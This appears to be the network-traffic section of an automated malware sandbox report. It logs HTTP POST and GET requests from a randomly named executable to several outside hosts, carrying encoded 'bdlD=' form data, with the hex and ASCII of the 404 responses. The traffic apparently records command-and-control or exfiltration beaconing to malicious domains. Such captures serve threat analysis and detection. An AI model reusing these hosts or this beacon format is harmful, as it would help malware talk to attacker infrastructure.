                                                                                                                                Data Ascii: bdlD=kz8HCGjAWtoCWmj1p7n71kGEF3pWO64J5RM6n0MGS9HlyRCnpdVa2R0WZOGiLiL1yriRiYNI0lpVzxFqh8/fCRPh+yk3HeUq7b2Elw1RKux463+6iRps+nTdxHI7qa6OyVtj1/NqIHr7E3w+6qlN/t4pHXGxdnMzWRz/o975psmLL8m9u8b+chHldWLKYsxf+M3HSdVJnKl4AQmFJr913e3+WL+S2UO/cWih6EZ5i3fzmIyDOeER/n50KCLmRysfCO/DTclisETWzblNNndwbRwTL5FX3c/nzULIdZ8zBBt2e2rPa/Ox+V/JAuhDXE/JSQ5x9x0O2cpe/SaLGo+9m2qS5SbrL9gJImzrH08SMf8P217EYDEpmlBuigYE3hfMyA7iaU9154Dws/G9Iigy8KpCEV0p7Tm2g1VYtHO5vk4KYoF0BAsg7+y1QsOz58m1fVZP5fVOteludIflW32+4CdBYWmcgLGUcFg4aHXy2GkaprMrM2hrUa9psLyoAUvcgnOkpVsopOPUiaq33EyoHI97/rF5n1bL9/PsKY4m+5uoT0v5npA/gKHZIvoFTSy6ZlgZ5ceVDSBi2akgEFu4fNTtjZXO73pYGzZAaxO7ERgZxP7HY9hxr9iCLkKMND8bIX6qnYbFjvHlr5GULHbDz847CdHthSm7kGcaEsS65WLEhg/ksEoQYZLbVfZ0mHlF6IfjTieThrWUMqpy1RVT8PE3jPYgjpGQdgx5suyo7F3adVaS4DB2zapdd/hD4lmXty63gdQmGm700VyCq82MQsvTQ/jGEqjYEAAheZPGlPRUUzKAqBvzcsUgdDuKUU8zaJ4lJECkNnUSsxHV+s2mpzmqlUnZs1nNGflPwjAVVFM07CTl5aurZMG76a6+e4GQgJmu6ter9s7nPlF3ngl5XNLoQa4aenHVxuDQm6W4E7NqHvHBR7GyW/LvsxFttjIRKGJdFa5M3sDQZ9kPAw5yoNjYUBjB1AlnDRLylCi0fEbG8l3 [TRUNCATED]
                                                                                                                                Nov 18, 2024 16:26:27.462975025 CET533INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:26:27 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.649997209.74.64.58801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:29.300158978 CET389OUTGET /afcr/?92=DPyPNvf84fs0yXSp&bdlD=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8BGuo8VlMLN9CkLyFlXp6E4p5ywSBzzNp8Wyc9RtRv/+r7WpQ+fc= HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.pluribiz.life
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:26:30.009793043 CET548INHTTP/1.1 404 Not Found
                                                                                                                                Date: Mon, 18 Nov 2024 15:26:29 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 389
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.64999947.242.89.146801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:35.826802969 CET631OUTPOST /1iqa/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.kdtzhb.top
                                                                                                                                Origin: http://www.kdtzhb.top
                                                                                                                                Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 45 34 68 2f 39 37 2f 55 69 32 41 6a 57 33 35 45 33 36 36 45 36 71 39 4c 77 69 45 6d 51 53 59 4f 63 6c 4a 45 41 56 36 64 4a 6c 6c 6d 63 46 51 64 36 52 69 79 59 55 49 57 79 6e 54 34 4f 4f 70 46 56 52 6c 62 61 36 41 4e 2b 33 32 38 76 72 66 6d 73 57 53 34 34 61 46 67 39 74 6f 5a 59 75 44 78 50 75 4b 2f 57 61 4a 71 33 4c 33 7a 4b 58 57 32 59 4a 4f 58 4b 56 38 72 50 59 43 7a 45 44 4c 37 69 70 70 49 38 4f 63 4c 36 2f 59 4e 6f 42 56 55 7a 49 43 63 59 74 6d 4a 43 58 4c 50 42 46 65 7a 67 69 30 79 76 73 4e 4d 59 44 5a 55 6d 6e 2b 58 79 50 73 74 63 39 4e 35 67 57 4b 7a 33 4e 65 64
                                                                                                                                Data Ascii: bdlD=JKwJ9AShvSeAE4h/97/Ui2AjW35E366E6q9LwiEmQSYOclJEAV6dJllmcFQd6RiyYUIWynT4OOpFVRlba6AN+328vrfmsWS44aFg9toZYuDxPuK/WaJq3L3zKXW2YJOXKV8rPYCzEDL7ippI8OcL6/YNoBVUzICcYtmJCXLPBFezgi0yvsNMYDZUmn+XyPstc9N5gWKz3Ned
                                                                                                                                Nov 18, 2024 16:26:36.860110998 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:26:36 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.65000047.242.89.146801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:38.408535004 CET655OUTPOST /1iqa/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.kdtzhb.top
                                                                                                                                Origin: http://www.kdtzhb.top
                                                                                                                                Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 49 4f 63 47 64 45 44 52 75 64 49 6c 6c 6d 58 6c 51 63 33 78 69 35 59 55 4e 72 79 6d 76 34 4f 4f 39 46 56 51 56 62 61 4a 6f 4d 73 33 32 2b 33 62 66 6b 68 32 53 34 34 61 46 67 39 73 4d 6a 59 75 62 78 4f 65 61 2f 58 35 52 70 37 72 33 30 43 33 57 32 53 70 4f 54 4b 56 39 2b 50 64 2f 6f 45 46 50 37 69 6f 5a 49 79 36 49 4d 76 50 59 4c 6e 68 55 72 33 36 54 74 57 4f 33 56 47 48 44 77 63 6c 32 74 6f 30 70 6f 7a 66 4e 76 4b 54 35 57 6d 6c 6d 6c 79 76 73 48 65 39 31 35 79 42 47 55 34 35 37 2b 45 44 46 53 4a 6e 44 52 71 78 68 62 71 49 48 46 79 66 54 57 77 77 3d 3d
                                                                                                                                Data Ascii: bdlD=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkIOcGdEDRudIllmXlQc3xi5YUNrymv4OO9FVQVbaJoMs32+3bfkh2S44aFg9sMjYubxOea/X5Rp7r30C3W2SpOTKV9+Pd/oEFP7ioZIy6IMvPYLnhUr36TtWO3VGHDwcl2to0pozfNvKT5WmlmlyvsHe915yBGU457+EDFSJnDRqxhbqIHFyfTWww==


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.65000147.242.89.146801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:41.103332996 CET1668OUTPOST /1iqa/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.kdtzhb.top
                                                                                                                                Origin: http://www.kdtzhb.top
                                                                                                                                Referer: http://www.kdtzhb.top/1iqa/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 4a 4b 77 4a 39 41 53 68 76 53 65 41 47 5a 78 2f 75 49 58 55 6c 57 41 67 56 33 35 45 35 71 36 41 36 71 35 4c 77 6a 41 32 51 6b 41 4f 62 30 46 45 5a 7a 47 64 61 56 6c 6d 4c 56 51 5a 33 78 69 65 59 51 5a 76 79 6d 6a 43 4f 4e 46 46 56 79 4e 62 53 59 6f 4d 6d 33 32 2b 2b 37 66 70 73 57 53 58 34 61 31 6b 39 74 38 6a 59 75 62 78 4f 59 65 2f 51 71 4a 70 39 72 33 7a 4b 58 57 79 59 4a 50 30 4b 56 6c 75 50 63 76 34 44 31 76 37 69 4c 68 49 77 4a 67 4d 74 76 59 4a 72 42 55 7a 33 36 66 32 57 4f 72 5a 47 45 66 65 63 69 47 74 37 44 73 44 6f 4d 64 75 59 6a 51 37 34 46 32 67 2b 49 55 79 55 65 34 45 33 79 75 6c 35 4a 4b 58 4e 6c 49 4a 47 47 47 63 67 44 64 6e 67 4e 53 73 38 76 79 53 71 78 2f 51 55 66 6c 6c 4e 63 67 41 6c 6b 41 2b 6a 4a 4e 4f 45 75 76 2f 6f 52 6c 70 61 33 52 4d 65 38 53 4d 44 69 65 47 54 6e 6b 77 71 64 37 49 45 4e 74 4c 4f 36 6e 58 6c 76 34 57 4e 30 33 67 71 30 52 52 6e 43 30 69 59 64 2b 4e 6b 59 56 32 32 61 71 64 59 6b 56 53 6d 77 69 41 37 2b 6b 44 4e 72 34 64 47 6b 35 32 54 61 4a 35 4b [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=JKwJ9AShvSeAGZx/uIXUlWAgV35E5q6A6q5LwjA2QkAOb0FEZzGdaVlmLVQZ3xieYQZvymjCONFFVyNbSYoMm32++7fpsWSX4a1k9t8jYubxOYe/QqJp9r3zKXWyYJP0KVluPcv4D1v7iLhIwJgMtvYJrBUz36f2WOrZGEfeciGt7DsDoMduYjQ74F2g+IUyUe4E3yul5JKXNlIJGGGcgDdngNSs8vySqx/QUfllNcgAlkA+jJNOEuv/oRlpa3RMe8SMDieGTnkwqd7IENtLO6nXlv4WN03gq0RRnC0iYd+NkYV22aqdYkVSmwiA7+kDNr4dGk52TaJ5KMolegeZTSQlbrCoRXpkfxibO8xVuBElh3kFGAU7kcQ6h67+/MkrUZzxkFqgp00+S2+son/kL4Co/jcMgFwhf+mJ0VQSCD0Kew/67ZBTyRlHzDhxS+TIhFe4C1Bah965NnwtvSBN6iv58BWlDsAZ7W2+th9p01EwlOZQ7PRk3eKQUUNvvmurBtoUoWyO6i0gGLsrweozQjXMyH+SRnk0tvEiD3Q6puGZ1iOUIXEBaPAtz5q+7zzVy6rqmIpOypBAPJpAHpve4DQ0Sw5I3p3XYad5c25xiIDucl9BIBDVIwk3F6L7ZxJnGI/rIhsxTN/E/YBgUvb1VwN5fVKODhsYEiaXXYPsCkXZSyUPQdsUtNHJNmFax918eQIIkbx9xe4XE1/hScjw41c+O9kINXGQ4WAsdJ7GAWZPOpN4U7SFbhh3qPKGzxXG4ZaFDZz7KFlOYRlfOEXXUNmMFITJF8hqFJ0/BJxQYrcigFeZEc7IbKnxTfWSY1C679ddlimZ6eU/th5BVruU2QrbpEpNBF9WsBXwCP9hnQTP/5uu6Ek9ipohR+BkiOMKiimRdRc0bbIGFT/rvqDTgADe0qDxY1lbicCrRf3M6wUf8z+xh2HTs1kERrcIza+2ay83jWyJHJCkKiDhpNFBF1VCJBB2jRPh3yu6thGHpf88GmM [TRUNCATED]
                                                                                                                                Nov 18, 2024 16:26:42.027108908 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:26:41 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                16192.168.2.65000247.242.89.146801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:43.638916016 CET386OUTGET /1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.kdtzhb.top
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:26:44.607912064 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:26:44 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                17192.168.2.650003128.65.195.180801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:49.877959967 CET637OUTPOST /293d/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.evoo.website
                                                                                                                                Origin: http://www.evoo.website
                                                                                                                                Referer: http://www.evoo.website/293d/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 4b 2b 4a 34 44 4b 44 4f 32 6b 4c 74 36 69 39 51 65 73 64 78 33 45 4b 49 52 46 62 41 4d 32 79 42 77 61 4e 6f 6c 42 39 4e 46 41 59 78 6f 37 6e 57 38 38 35 76 59 43 69 66 50 35 73 59 4c 7a 50 34 48 51 37 30 4d 76 7a 44 57 4b 59 33 31 72 44 76 55 78 71 4e 62 4b 63 4e 53 69 70 6f 44 64 65 4a 6c 45 5a 71 6f 51 75 51 6d 6c 54 46 70 73 49 63 6c 69 49 65 30 42 4d 41 37 75 67 79 45 67 45 44 34 74 64 4d 70 67 42 48 66 51 61 46 6e 4d 50 69 49 69 38 34 32 66 35 41 4b 45 76 30 74 4c 37 78 62 2b 38 48 4f 54 5a 6a 50 56 4b 66 38 30 66 46 35 33 4a 6a 57 56 46 42 70 57 4c 5a 49 39 70 64
                                                                                                                                Data Ascii: bdlD=2ZmzkMINTYaaK+J4DKDO2kLt6i9Qesdx3EKIRFbAM2yBwaNolB9NFAYxo7nW885vYCifP5sYLzP4HQ70MvzDWKY31rDvUxqNbKcNSipoDdeJlEZqoQuQmlTFpsIcliIe0BMA7ugyEgED4tdMpgBHfQaFnMPiIi842f5AKEv0tL7xb+8HOTZjPVKf80fF53JjWVFBpWLZI9pd


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                18192.168.2.650004128.65.195.180801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:26:52.428956985 CET661OUTPOST /293d/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.evoo.website
                                                                                                                                Origin: http://www.evoo.website
                                                                                                                                Referer: http://www.evoo.website/293d/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 32 5a 6d 7a 6b 4d 49 4e 54 59 61 61 46 2b 35 34 41 74 58 4f 2b 6b 4c 71 35 69 39 51 46 63 64 31 33 45 4f 49 52 42 4c 51 50 43 65 42 33 2f 78 6f 33 51 39 4e 45 41 59 78 6a 62 6e 58 7a 63 35 77 59 43 75 58 50 38 4d 59 4c 7a 4c 34 48 56 2f 30 4d 2f 4f 78 58 61 59 31 2b 4c 44 58 4a 68 71 4e 62 4b 63 4e 53 6a 4d 44 44 5a 79 4a 6c 30 70 71 70 30 79 50 72 46 54 61 2f 38 49 63 76 43 49 61 30 42 4e 56 37 73 55 4c 45 69 4d 44 34 73 74 4d 71 31 68 41 52 51 61 44 6a 4d 4f 31 4f 54 42 32 75 76 4d 41 55 57 44 2b 30 4a 53 52 65 49 68 64 53 67 5a 41 64 46 71 64 38 32 48 33 35 58 4a 4a 55 56 39 42 37 42 48 2b 48 4a 4d 2b 6a 5a 36 68 31 59 77 62 56 4c 67 31 46 58 65 4d 79 45 42 49 34 51 3d 3d
